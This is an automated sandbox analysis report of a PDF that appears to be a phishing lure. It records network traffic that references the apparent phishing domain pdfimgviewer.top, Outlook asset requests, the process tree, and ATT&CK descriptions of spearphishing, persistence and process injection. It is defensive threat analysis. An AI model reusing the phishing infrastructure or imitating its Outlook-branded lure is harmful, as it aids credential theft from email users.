2024-12-10 09:06:54 UTC	1369	IN	Data Raw: 20 74 72 69 67 67 65 72 20 74 68 69 73 20 62 6c 6f 63 6b 20 69 6e 63 6c 75 64 69 6e 67 20 73 75 62 6d 69 74 74 69 6e 67 20 61 20 63 65 72 74 61 69 6e 20 77 6f 72 64 20 6f 72 20 70 68 72 61 73 65 2c 20 61 20 53 51 4c 20 63 6f 6d 6d 61 6e 64 20 6f 72 20 6d 61 6c 66 6f 72 6d 65 64 20 64 61 74 61 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 72 65 73 6f 6c 76 65 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 61 74 20 63 61 6e 20 49 20 64 6f 20 74 6f 20 72 65 73 6f 6c 76 65 20 74 68 69 73 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 Data Ascii: trigger this block including submitting a certain word or phrase, a SQL command or malformed data.</p> </div> <div class="cf-column"> <h2 data-translate="blocked_resolve_headline">What can I do to resolve this?</h2>
2024-12-10 09:06:54 UTC	728	IN	Data Raw: 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 0a 20 20 3c 2f 70 3e 0a 20 20 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 Data Ascii: by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById(

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report letter_sjoslin_odeonuk.com.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

QR Codes

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241210090625Z-164.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr81920.dat

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\TESTING

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.json

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

C:\Users\user\AppData\Local\Temp\acrord32_sbx\A91qfmkz6_1j450dc_6gw.tmp

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 92

Chrome Cache Entry: 93

Chrome Cache Entry: 94

Chrome Cache Entry: 95

Chrome Cache Entry: 96

Chrome Cache Entry: 97

Chrome Cache Entry: 98

Windows Analysis Report
letter_sjoslin_odeonuk.com.pdf

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:54 UTC	665	OUT	GET /assets/mail/illustrations/noMailSelected/v2/light.svg HTTP/1.1 Host: res.public.onecdn.static.microsoft Connection: keep-alive sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://eatnjyz20r.pdfimgviewer.top/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2024-12-10 09:06:54 UTC	1145	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET,HEAD,OPTIONS Access-Control-Allow-Origin: * Access-Control-Expose-Headers: date,X-Cdn-Provider,X-Ms-Request-Id Age: 310117 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Cache-Control: max-age=31536000 Content-Type: image/svg+xml Date: Tue, 10 Dec 2024 09:06:54 GMT Last-Modified: Thu, 22 Feb 2024 17:06:24 GMT NEL: {"report_to":"NelM365CDNUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} Report-To: {"group":"NelM365CDNUpload1","max_age":604800,"endpoints":[{"url":"https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Atlanta&ASN=60068&Country=US&Region=GA&RequestIdentifier=807812185285019925015231019117732295499"}],"include_subdomains ":true} Server: ECAcc (agc/7F69) Strict-Transport-Security: max-age=31536000; includeSubDomains Timing-Allow-Origin: * Vary: Accept-Encoding X-Cache: HIT X-CDN-Provider: Verizon x-ms-request-id: d90655cc-201e-0053-2b10-484b34000000 Content-Length: 6350 Connection: close
2024-12-10 09:06:54 UTC	6350	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 35 31 32 22 20 68 65 69 67 68 74 3d 22 35 31 33 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 75 72 6c 28 23 61 29 22 20 64 3d 22 4d 34 32 39 2e 34 33 39 20 32 36 32 2e 38 34 37 76 2d 32 31 2e 37 35 32 4c 32 38 30 2e 34 39 33 20 38 33 2e 37 36 39 63 2d 31 32 2e 34 36 35 2d 31 33 2e 33 36 37 2d 33 34 2e 34 32 37 2d 31 33 2e 36 36 34 2d 34 36 2e 35 39 35 20 30 43 32 32 31 2e 37 32 39 20 39 37 2e 34 33 33 20 38 32 2e 35 36 31 20 32 34 30 2e 37 39 36 20 38 32 2e 35 36 31 20 32 34 30 2e 37 39 36 76 32 33 2e 30 34 35 4c 32 35 33 2e 39 20 33 38 32 2e 39 35 33 6c 31 37 35 2e 35 33 39 2d 31 32 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="512" height="513" fill="none"><path fill="url(#a)" d="M429.439 262.847v-21.752L280.493 83.769c-12.465-13.367-34.427-13.664-46.595 0C221.729 97.433 82.561 240.796 82.561 240.796v23.045L253.9 382.953l175.539-12

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:54 UTC	565	OUT	GET /cdn-cgi/challenge-platform/h/g/jsd/r/8efc14cc593153fc HTTP/1.1 Host: www.odeon.co.uk Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
2024-12-10 09:06:54 UTC	173	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 10 Dec 2024 09:06:54 GMT Content-Length: 0 Connection: close allow: POST Server: cloudflare CF-RAY: 8efc14e3cc05ad5f-ATL

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:55 UTC	612	OUT	GET /mail/favicon.ico HTTP/1.1 Host: outlook.office.com Connection: keep-alive sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://eatnjyz20r.pdfimgviewer.top/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2024-12-10 09:06:55 UTC	942	IN	HTTP/1.1 200 OK Content-Length: 7886 Content-Type: image/x-icon Last-Modified: Thu, 28 Nov 2024 17:50:11 GMT Accept-Ranges: bytes ETag: "1db41bdf86bd54e" Server: Microsoft-IIS/10.0 request-id: ab0f0d4e-d0a2-bd2a-df67-9690b61c4c21 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-PreferredRoutingKeyDiagnostics: 0 X-CalculatedFETarget: PH7PR13CU001.internal.outlook.com X-BackEndHttpStatus: 200 X-NanoProxy: 1 X-Proxy-BackendServerStatus: 200 X-CalculatedBETarget: PH0PR13MB5035.NAMPRD13.PROD.OUTLOOK.COM X-FEServer: PH7PR13CA0015 x-besku: UNKNOWN X-BackEndHttpStatus: 200 X-Proxy-RoutingCorrectness: 1 X-FEProxyInfo: BL1PR13CA0119.NAMPRD13.PROD.OUTLOOK.COM X-FEEFZInfo: MNZ MS-CV: Tg0Pq6LQKr3fZ5aQthxMIQ.1.1 Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-FirstHopCafeEFZ: MNZ X-Powered-By: ASP.NET X-FEServer: BL1PR13CA0119 Date: Tue, 10 Dec 2024 09:06:54 GMT Connection: close
2024-12-10 09:06:55 UTC	7886	IN	Data Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 a8 10 00 00 36 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 de 10 00 00 10 10 00 00 01 00 20 00 68 04 00 00 66 1a 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6 hf( @

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:56 UTC	364	OUT	GET /mail/favicon.ico HTTP/1.1 Host: outlook.office.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2024-12-10 09:06:56 UTC	942	IN	HTTP/1.1 200 OK Content-Length: 7886 Content-Type: image/x-icon Last-Modified: Thu, 28 Nov 2024 17:50:11 GMT Accept-Ranges: bytes ETag: "1db41bdf86bd54e" Server: Microsoft-IIS/10.0 request-id: 52279fac-dd58-35bf-424b-e07e52f463a9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-PreferredRoutingKeyDiagnostics: 0 X-CalculatedFETarget: DS7PR06CU001.internal.outlook.com X-BackEndHttpStatus: 200 X-NanoProxy: 1 X-Proxy-BackendServerStatus: 200 X-CalculatedBETarget: DM6PR14MB4218.NAMPRD14.PROD.OUTLOOK.COM X-FEServer: DS7PR06CA0024 x-besku: UNKNOWN X-BackEndHttpStatus: 200 X-Proxy-RoutingCorrectness: 1 X-FEProxyInfo: BN1PR14CA0029.NAMPRD14.PROD.OUTLOOK.COM X-FEEFZInfo: LYH MS-CV: rJ8nUljdvzVCS+B+UvRjqQ.1.1 Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-FirstHopCafeEFZ: LYH X-Powered-By: ASP.NET X-FEServer: BN1PR14CA0029 Date: Tue, 10 Dec 2024 09:06:55 GMT Connection: close
2024-12-10 09:06:56 UTC	7886	IN	Data Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 a8 10 00 00 36 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 de 10 00 00 10 10 00 00 01 00 20 00 68 04 00 00 66 1a 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6 hf( @

Target ID:	0
Start time:	04:06:20
Start date:	10/12/2024
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\letter_sjoslin_odeonuk.com.pdf"
Imagebase:	0x160000
File size:	3'014'368 bytes
MD5 hash:	6791EAE6124B58F201B32F1F6C3EC1B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	3
Start time:	04:06:44
Start date:	10/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "http://mailto:sjoslin@odeonuk.com"
Imagebase:	0x7ff60de70000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	5
Start time:	04:06:45
Start date:	10/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2192,i,10706945887835568525,2780565783703693333,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2212 /prefetch:3
Imagebase:	0x7ff60de70000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre